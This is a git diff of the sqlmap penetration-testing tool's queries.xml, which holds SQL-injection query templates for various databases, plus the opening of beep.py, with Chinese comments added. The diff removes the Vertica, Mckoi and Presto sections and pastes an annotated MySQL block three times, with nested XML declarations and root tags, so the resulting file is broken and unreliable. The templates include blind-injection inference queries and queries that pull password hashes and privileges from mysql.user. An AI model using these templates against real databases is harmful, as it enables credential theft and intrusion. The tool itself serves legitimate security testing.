-            <!-- NOTE: Vertica does not cache DISTINCT queries (must use ORDER BY to have consistent results) -->
-            <blind query="SELECT DISTINCT(privileges_description) FROM v_catalog.grants WHERE grantee='%s' ORDER BY 1 LIMIT 1 OFFSET %d" count="SELECT COUNT(DISTINCT(privileges_description)) FROM grants WHERE grantee='%s'"/>
+            <!-- 获取所有用户的权限信息 -->
+            <inband query="SELECT grantee,privilege_type FROM INFORMATION_SCHEMA.USER_PRIVILEGES" condition="grantee" query2="SELECT user,select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user" condition2="user"/>
+            
+            <!-- 盲注查询，获取指定用户的权限信息 -->
+            <blind query="SELECT DISTINCT(privilege_type) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s' LIMIT %d,1" query2="SELECT select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(privilege_type)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s'" count2="SELECT COUNT(*) FROM mysql.user WHERE user='%s'"/>
         </privileges>
-        <roles/>
-        <statements>
-            <inband query="SELECT current_statement FROM v_monitor.sessions"/>
-            <blind query="SELECT DISTINCT(current_statement) FROM v_monitor.sessions ORDER BY 1 OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(current_statement)) FROM v_monitor.sessions"/>
-        </statements>
-        <dbs>
-            <inband query="SELECT schema_name FROM v_catalog.schemata"/>
-            <blind query="SELECT DISTINCT(schema_name) FROM v_catalog.schemata ORDER BY 1 OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(schema_name)) FROM v_catalog.schemata"/>
-        </dbs>
-        <tables>
-            <inband query="SELECT schema_name,table_name FROM v_catalog.all_tables" condition="schema_name"/>
-            <blind query="SELECT table_name FROM v_catalog.all_tables WHERE schema_name='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(table_name) FROM v_catalog.all_tables WHERE schema_name='%s'"/>
-        </tables>
-        <columns>
-            <inband query="SELECT column_name,data_type FROM v_catalog.columns WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
-            <blind query="SELECT column_name FROM v_catalog.columns WHERE table_name='%s' AND table_schema='%s'" query2="SELECT data_type FROM v_catalog.columns WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM v_catalog.columns WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
-        </columns>
-        <dump_table>
-            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
-            <blind query="SELECT %s FROM %s.%s ORDER BY %s OFFSET %d LIMIT 1" count="SELECT COUNT(*) FROM %s.%s"/>
-        </dump_table>
-        <search_db>
-            <inband query="SELECT schema_name FROM v_catalog.schemata WHERE %s" condition="schema_name"/>
-            <blind query="SELECT DISTINCT(schema_name) FROM v_catalog.schemata WHERE %s ORDER BY 1" count="SELECT COUNT(DISTINCT(schema_name)) FROM v_catalog.schemata WHERE %s" condition="schema_name"/>
-        </search_db>
-        <search_table>
-            <inband query="SELECT schema_name,table_name FROM v_catalog.all_tables WHERE %s" condition="table_name" condition2="schema_name"/>
-            <blind query="SELECT DISTINCT(schema_name) FROM v_catalog.all_tables WHERE %s ORDER BY 1" query2="SELECT table_name FROM v_catalog.all_tables WHERE schema_name='%s'" count="SELECT COUNT(DISTINCT(schema_name)) FROM v_catalog.all_tables WHERE %s" count2="SELECT COUNT(table_name) FROM v_catalog.all_tables WHERE schema_name='%s'" condition="table_name" condition2="schema_name"/>
-        </search_table>
-        <search_column>
-            <inband query="SELECT table_schema,table_name FROM v_catalog.columns WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
-            <blind query="SELECT DISTINCT(table_schema) FROM v_catalog.columns WHERE %s ORDER BY 1" query2="SELECT DISTINCT(table_name) FROM v_catalog.columns WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM v_catalog.columns WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM v_catalog.columns WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
-        </search_column>
-    </dbms>
 
-    <dbms value="Mckoi">
-        <!-- NOTE: DBMS with minimalistic set of (restricted) features -->
-        <cast query="CONCAT('',%s)"/>
-        <length query="LENGTH(%s)"/>
-        <isnull query="IF(%s IS NULL,' ', %s)"/>
-        <delimiter query="||"/>
-        <limit/>
-        <limitregexp/>
-        <limitgroupstart/>
-        <limitgroupstop/>
-        <limitstring/>
+<?xml version="1.0" encoding="UTF-8"?>
+<!-- XML 文件声明，指定版本为 1.0，编码为 UTF-8 -->
+
+<root>
+    <!-- 根元素，包含所有数据库相关的查询模板 -->
+
+    <dbms value="MySQL">
+        <!-- 定义 MySQL 数据库管理系统相关的查询模板 -->
+
+        <!-- 将字段转换为 NCHAR 类型 -->
+        <cast query="CAST(%s AS NCHAR)"/>
+        
+        <!-- 获取字段的字符长度 -->
+        <length query="CHAR_LENGTH(%s)"/>
+        
+        <!-- 判断字段是否为 NULL，如果是则返回空格 -->
+        <isnull query="IFNULL(%s,' ')"/>
+        
+        <!-- 定义字段分隔符为逗号 -->
+        <delimiter query=","/>
+        
+        <!-- 定义 LIMIT 子句，用于分页查询 -->
+        <limit query="LIMIT %d,%d"/>
+        
+        <!-- 正则表达式匹配 LIMIT 子句，支持两种格式：LIMIT d,d 和 LIMIT d -->
+        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+        
+        <!-- 定义 LIMIT 子句中起始位置的分组索引 -->
+        <limitgroupstart query="1"/>
+        
+        <!-- 定义 LIMIT 子句中结束位置的分组索引 -->
+        <limitgroupstop query="2"/>
+        
+        <!-- 定义 LIMIT 子句的字符串表示 -->
+        <limitstring query=" LIMIT "/>
+        
+        <!-- 定义 ORDER BY 子句，按指定字段升序排序 -->
         <order query="ORDER BY %s ASC"/>
+        
+        <!-- 计算字段的行数 -->
         <count query="COUNT(%s)"/>
-        <comment query=";"/>
-        <substring query="SUBSTRING((%s),%d,%d)"/>
-        <concatenate query="%s||%s"/>
-        <case query="SELECT (IF(%s,1,0))"/>
-        <!-- NOTE: other way around does not work -->
-        <inference query="'%c'&lt;SUBSTRING((%s),%d,1)"/>
-        <banner/>
-        <current_user/>
-        <current_db/>
-        <hostname/>
-        <table_comment/>
-        <column_comment/>
-        <is_dba/>
-        <dbs/>
-        <tables/>
-        <dump_table>
-            <inband query="SELECT %s FROM %s"/>
-            <blind query="SELECT MIN(%s) FROM %s WHERE CONCAT('',%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONCAT('',%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(DISTINCT(%s)) FROM %s"/>
-        </dump_table>
-        <users/>
-        <privileges/>
-        <roles/>
-        <statements/>
-        <search_db/>
-        <search_table/>
-        <search_column/>
-   </dbms>
+        
+        <!-- 定义 SQL 注释的三种形式：-- -、/* 和 # -->
+        <comment query="-- -" query2="/*" query3="#"/>
+        
+        <!-- 获取字段的子字符串 -->
+        <substring query="MID((%s),%d,%d)"/>
+        
+        <!-- 连接两个字符串 -->
+        <concatenate query="CONCAT(%s,%s)"/>
+        
+        <!-- 使用 CASE 语句进行条件判断 -->
+        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        
+        <!-- 将字段转换为十六进制表示 -->
+        <hex query="HEX(%s)"/>
+        
+        <!-- 推断字段中某个字符的 ASCII 码是否大于指定值 -->
+        <inference query="ORD(MID((%s),%d,1))>%d"/>
+        
+        <!-- 获取数据库版本信息 -->
+        <banner query="VERSION()"/>
+        
+        <!-- 获取当前用户 -->
+        <current_user query="CURRENT_USER()"/>
+        
+        <!-- 获取当前数据库名称 -->
+        <current_db query="DATABASE()"/>
+        
+        <!-- 获取数据库服务器的主机名 -->
+        <hostname query="@@HOSTNAME"/>
+        
+        <!-- 获取指定表的注释信息 -->
+        <table_comment query="SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' AND table_name='%s'"/>
+        
+        <!-- 获取指定列的注释信息 -->
+        <column_comment query="SELECT column_comment FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' AND table_name='%s' AND column_name='%s'"/>
+        
+        <!-- 检查当前用户是否具有 DBA 权限 -->
+        <is_dba query="(SELECT super_priv FROM mysql.user WHERE user='%s' LIMIT 0,1)='Y'"/>
+        
+        <!-- 检查是否存在指定的用户定义函数 (UDF) -->
+        <check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0,1)='%s'"/>
+        
+        <!-- 用户相关的查询模板 -->
+        <users>
+            <!-- 获取所有用户的权限信息 -->
+            <inband query="SELECT grantee FROM INFORMATION_SCHEMA.USER_PRIVILEGES" query2="SELECT user FROM mysql.user" query3="SELECT username FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
+            
+            <!-- 盲注查询，获取指定位置的用户信息 -->
+            <blind query="SELECT DISTINCT(grantee) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT %d,1" query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d,1" query3="SELECT DISTINCT(username) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS LIMIT %d,1" count="SELECT COUNT(DISTINCT(grantee)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES" count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user" count3="SELECT COUNT(DISTINCT(username)) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
+        </users>
+        
+        <!-- 密码相关的查询模板 -->
+        <passwords>
+            <!-- 获取所有用户的用户名和密码哈希 -->
+            <inband query="SELECT user,authentication_string FROM mysql.user" condition="user"/>
+            
+            <!-- 盲注查询，获取指定用户的密码哈希 -->
+            <blind query="SELECT DISTINCT(authentication_string) FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(authentication_string)) FROM mysql.user WHERE user='%s'"/>
+        </passwords>
+        
+        <!-- 权限相关的查询模板 -->
+        <privileges>
+            <!-- 获取所有用户的权限信息 -->
+            <inband query="SELECT grantee,privilege_type FROM INFORMATION_SCHEMA.USER_PRIVILEGES" condition="grantee" query2="SELECT user,select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user" condition2="user"/>
+            
+            <!-- 盲注查询，获取指定用户的权限信息 -->
+            <blind query="SELECT DISTINCT(privilege_type) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s' LIMIT %d,1" query2="SELECT select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(privilege_type)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s'" count2="SELECT COUNT(*) FROM mysql.user WHERE user='%s'"/>
+        </privileges>
 
-    <dbms value="Presto">
-        <cast query="CAST(%s AS VARCHAR(4000))"/>
-        <length query="LENGTH(%s)"/>
-        <isnull query="COALESCE(%s,' ')"/>
-        <delimiter query="||"/>
-        <limit query="OFFSET %d LIMIT %d"/>
-        <limitregexp query="\s+OFFSET\s+([\d]+)\s+LIMIT\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+<?xml version="1.0" encoding="UTF-8"?>
+<!-- XML 文件声明，指定版本为 1.0，编码为 UTF-8 -->
+
+<root>
+    <!-- 根元素，包含所有数据库相关的查询模板 -->
+
+    <dbms value="MySQL">
+        <!-- 定义 MySQL 数据库管理系统相关的查询模板 -->
+
+        <!-- 将字段转换为 NCHAR 类型 -->
+        <cast query="CAST(%s AS NCHAR)"/>
+        
+        <!-- 获取字段的字符长度 -->
+        <length query="CHAR_LENGTH(%s)"/>
+        
+        <!-- 判断字段是否为 NULL，如果是则返回空格 -->
+        <isnull query="IFNULL(%s,' ')"/>
+        
+        <!-- 定义字段分隔符为逗号 -->
+        <delimiter query=","/>
+        
+        <!-- 定义 LIMIT 子句，用于分页查询 -->
+        <limit query="LIMIT %d,%d"/>
+        
+        <!-- 正则表达式匹配 LIMIT 子句，支持两种格式：LIMIT d,d 和 LIMIT d -->
+        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+        
+        <!-- 定义 LIMIT 子句中起始位置的分组索引 -->
         <limitgroupstart query="1"/>
+        
+        <!-- 定义 LIMIT 子句中结束位置的分组索引 -->
         <limitgroupstop query="2"/>
-        <limitstring query=" OFFSET "/>
+        
+        <!-- 定义 LIMIT 子句的字符串表示 -->
+        <limitstring query=" LIMIT "/>
+        
+        <!-- 定义 ORDER BY 子句，按指定字段升序排序 -->
         <order query="ORDER BY %s ASC"/>
+        
+        <!-- 计算字段的行数 -->
         <count query="COUNT(%s)"/>
-        <comment query="--"/>
-        <substring query="SUBSTR(%s,%d,%d)"/>
-        <concatenate query="%s||%s"/>
-        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
-        <hex query="TO_HEX(%s)"/>
-        <inference query="CODEPOINT(SUBSTR((%s),%d,1))>%d" dbms_version="&gt;=0.178" query2="SUBSTR((%s),%d,1)>'%c'"/>/>
-        <banner/>
-        <current_user query="CURRENT_USER"/>
-        <current_db/>
-        <hostname/>
+        
+        <!-- 定义 SQL 注释的三种形式：-- -、/* 和 # -->
+        <comment query="-- -" query2="/*" query3="#"/>
+        
+        <!-- 获取字段的子字符串 -->
+        <substring query="MID((%s),%d,%d)"/>
+        
+        <!-- 连接两个字符串 -->
+        <concatenate query="CONCAT(%s,%s)"/>
+        
+        <!-- 使用 CASE 语句进行条件判断 -->
+        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        
+        <!-- 将字段转换为十六进制表示 -->
+        <hex query="HEX(%s)"/>
+        
+        <!-- 推断字段中某个字符的 ASCII 码是否大于指定值 -->
+        <inference query="ORD(MID((%s),%d,1))>%d"/>
+        
+        <!-- 获取数据库版本信息 -->
+        <banner query="VERSION()"/>
+        
+        <!-- 获取当前用户 -->
+        <current_user query="CURRENT_USER()"/>
+        
+        <!-- 获取当前数据库名称 -->
+        <current_db query="DATABASE()"/>
+        
+        <!-- 获取数据库服务器的主机名 -->
+        <hostname query="@@HOSTNAME"/>
+        
+        <!-- 获取指定表的注释信息 -->
         <table_comment query="SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' AND table_name='%s'"/>
+        
+        <!-- 获取指定列的注释信息 -->
         <column_comment query="SELECT column_comment FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' AND table_name='%s' AND column_name='%s'"/>
-        <is_dba/>
-        <check_udf/>
-        <users/>
-        <passwords/>
-        <privileges/>
-        <roles/>
-        <statements/>
-        <dbs>
-            <inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA"/>
-            <blind query="SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA ORDER BY 1 OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA"/>
-        </dbs>
-        <tables>
-            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES" condition="table_schema"/>
-            <blind query="SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'"/>
-        </tables>
-        <columns>
-            <inband query="SELECT column_name,data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
-            <blind query="SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" query2="SELECT data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
-        </columns>
-        <dump_table>
-            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
-            <blind query="SELECT %s FROM %s.%s ORDER BY %s OFFSET %d LIMIT 1" count="SELECT COUNT(*) FROM %s.%s"/>
-        </dump_table>
-        <search_db>
-            <inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
-            <blind query="SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" count="SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
-        </search_db>
-        <search_table>
-            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="table_name" condition2="table_schema"/>
-            <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" condition="table_name" condition2="table_schema"/>
-        </search_table>
+        
+        <!-- 检查当前用户是否具有 DBA 权限 -->
+        <is_dba query="(SELECT super_priv FROM mysql.user WHERE user='%s' LIMIT 0,1)='Y'"/>
+        
+        <!-- 检查是否存在指定的用户定义函数 (UDF) -->
+        <check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0,1)='%s'"/>
+        
+        <!-- 用户相关的查询模板 -->
+        <users>
+            <!-- 获取所有用户的权限信息 -->
+            <inband query="SELECT grantee FROM INFORMATION_SCHEMA.USER_PRIVILEGES" query2="SELECT user FROM mysql.user" query3="SELECT username FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
+            
+            <!-- 盲注查询，获取指定位置的用户信息 -->
+            <blind query="SELECT DISTINCT(grantee) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT %d,1" query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d,1" query3="SELECT DISTINCT(username) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS LIMIT %d,1" count="SELECT COUNT(DISTINCT(grantee)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES" count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user" count3="SELECT COUNT(DISTINCT(username)) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
+        </users>
+        
+        <!-- 密码相关的查询模板 -->
+        <passwords>
+            <!-- 获取所有用户的用户名和密码哈希 -->
+            <inband query="SELECT user,authentication_string FROM mysql.user" condition="user"/>
+            
+            <!-- 盲注查询，获取指定用户的密码哈希 -->
+            <blind query="SELECT DISTINCT(authentication_string) FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(authentication_string)) FROM mysql.user WHERE user='%s'"/>
+        </passwords>
+        
+        <!-- 权限相关的查询模板 -->
+        <privileges>
+            <!-- 获取所有用户的权限信息 -->
+            <inband query="SELECT grantee,privilege_type FROM INFORMATION_SCHEMA.USER_PRIVILEGES" condition="grantee" query2="SELECT user,select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user" condition2="user"/>
+            
+            <!-- 盲注查询，获取指定用户的权限信息 -->
+            <blind query="SELECT DISTINCT(privilege_type) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s' LIMIT %d,1" query2="SELECT select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(privilege_type)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s'" count2="SELECT COUNT(*) FROM mysql.user WHERE user='%s'"/>
+        </privileges>
+
         <search_column>
             <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
             <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
@@ -1586,6 +1077,117 @@
             <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
         </search_column>
     </dbms>
+    <?xml version="1.0" encoding="UTF-8"?>
+<!-- XML 文件声明，指定版本为 1.0，编码为 UTF-8 -->
+
+<root>
+    <!-- 根元素，包含所有数据库相关的查询模板 -->
+
+    <dbms value="MySQL">
+        <!-- 定义 MySQL 数据库管理系统相关的查询模板 -->
+
+        <!-- 将字段转换为 NCHAR 类型 -->
+        <cast query="CAST(%s AS NCHAR)"/>
+        
+        <!-- 获取字段的字符长度 -->
+        <length query="CHAR_LENGTH(%s)"/>
+        
+        <!-- 判断字段是否为 NULL，如果是则返回空格 -->
+        <isnull query="IFNULL(%s,' ')"/>
+        
+        <!-- 定义字段分隔符为逗号 -->
+        <delimiter query=","/>
+        
+        <!-- 定义 LIMIT 子句，用于分页查询 -->
+        <limit query="LIMIT %d,%d"/>
+        
+        <!-- 正则表达式匹配 LIMIT 子句，支持两种格式：LIMIT d,d 和 LIMIT d -->
+        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
+        
+        <!-- 定义 LIMIT 子句中起始位置的分组索引 -->
+        <limitgroupstart query="1"/>
+        
+        <!-- 定义 LIMIT 子句中结束位置的分组索引 -->
+        <limitgroupstop query="2"/>
+        
+        <!-- 定义 LIMIT 子句的字符串表示 -->
+        <limitstring query=" LIMIT "/>
+        
+        <!-- 定义 ORDER BY 子句，按指定字段升序排序 -->
+        <order query="ORDER BY %s ASC"/>
+        
+        <!-- 计算字段的行数 -->
+        <count query="COUNT(%s)"/>
+        
+        <!-- 定义 SQL 注释的三种形式：-- -、/* 和 # -->
+        <comment query="-- -" query2="/*" query3="#"/>
+        
+        <!-- 获取字段的子字符串 -->
+        <substring query="MID((%s),%d,%d)"/>
+        
+        <!-- 连接两个字符串 -->
+        <concatenate query="CONCAT(%s,%s)"/>
+        
+        <!-- 使用 CASE 语句进行条件判断 -->
+        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
+        
+        <!-- 将字段转换为十六进制表示 -->
+        <hex query="HEX(%s)"/>
+        
+        <!-- 推断字段中某个字符的 ASCII 码是否大于指定值 -->
+        <inference query="ORD(MID((%s),%d,1))>%d"/>
+        
+        <!-- 获取数据库版本信息 -->
+        <banner query="VERSION()"/>
+        
+        <!-- 获取当前用户 -->
+        <current_user query="CURRENT_USER()"/>
+        
+        <!-- 获取当前数据库名称 -->
+        <current_db query="DATABASE()"/>
+        
+        <!-- 获取数据库服务器的主机名 -->
+        <hostname query="@@HOSTNAME"/>
+        
+        <!-- 获取指定表的注释信息 -->
+        <table_comment query="SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' AND table_name='%s'"/>
+        
+        <!-- 获取指定列的注释信息 -->
+        <column_comment query="SELECT column_comment FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' AND table_name='%s' AND column_name='%s'"/>
+        
+        <!-- 检查当前用户是否具有 DBA 权限 -->
+        <is_dba query="(SELECT super_priv FROM mysql.user WHERE user='%s' LIMIT 0,1)='Y'"/>
+        
+        <!-- 检查是否存在指定的用户定义函数 (UDF) -->
+        <check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0,1)='%s'"/>
+        
+        <!-- 用户相关的查询模板 -->
+        <users>
+            <!-- 获取所有用户的权限信息 -->
+            <inband query="SELECT grantee FROM INFORMATION_SCHEMA.USER_PRIVILEGES" query2="SELECT user FROM mysql.user" query3="SELECT username FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
+            
+            <!-- 盲注查询，获取指定位置的用户信息 -->
+            <blind query="SELECT DISTINCT(grantee) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT %d,1" query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d,1" query3="SELECT DISTINCT(username) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS LIMIT %d,1" count="SELECT COUNT(DISTINCT(grantee)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES" count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user" count3="SELECT COUNT(DISTINCT(username)) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
+        </users>
+        
+        <!-- 密码相关的查询模板 -->
+        <passwords>
+            <!-- 获取所有用户的用户名和密码哈希 -->
+            <inband query="SELECT user,authentication_string FROM mysql.user" condition="user"/>
+            
+            <!-- 盲注查询，获取指定用户的密码哈希 -->
+            <blind query="SELECT DISTINCT(authentication_string) FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(authentication_string)) FROM mysql.user WHERE user='%s'"/>
+        </passwords>
+        
+        <!-- 权限相关的查询模板 -->
+        <privileges>
+            <!-- 获取所有用户的权限信息 -->
+            <inband query="SELECT grantee,privilege_type FROM INFORMATION_SCHEMA.USER_PRIVILEGES" condition="grantee" query2="SELECT user,select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user" condition2="user"/>
+            
+            <!-- 盲注查询，获取指定用户的权限信息 -->
+            <blind query="SELECT DISTINCT(privilege_type) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s' LIMIT %d,1" query2="SELECT select_priv,insert_priv,update_priv,delete_priv,create_priv,drop_priv,reload_priv,shutdown_priv,process_priv,file_priv,grant_priv,references_priv,index_priv,alter_priv,show_db_priv,super_priv,create_tmp_table_priv,lock_tables_priv,execute_priv,repl_slave_priv,repl_client_priv,create_view_priv,show_view_priv,create_routine_priv,alter_routine_priv,create_user_priv FROM mysql.user WHERE user='%s' LIMIT %d,1" count="SELECT COUNT(DISTINCT(privilege_type)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES WHERE grantee %s '%s'" count2="SELECT COUNT(*) FROM mysql.user WHERE user='%s'"/>
+        </privileges>
+
 
     <dbms value="eXtremeDB">
         <cast query="CAST(%s AS VARCHAR(4000))"/>
diff --git a/src/sqlmap-master/extra/beep/beep.py b/src/sqlmap-master/extra/beep/beep.py
index 788bafd..4ed4a29 100644
--- a/src/sqlmap-master/extra/beep/beep.py
+++ b/src/sqlmap-master/extra/beep/beep.py
@@ -9,96 +9,114 @@ See the file 'LICENSE' for copying permission
 
 import os
 import sys
-import wave
+import wave  # 用于处理 WAV 文件格式
 
+# 指定蜂鸣音频文件的路径
 BEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), "beep.wav")
 
 def beep():
+    """根据操作系统播放蜂鸣声。"""
     try:
+        # 检测操作系统并调用相应的播放方法
         if sys.platform.startswith("win"):
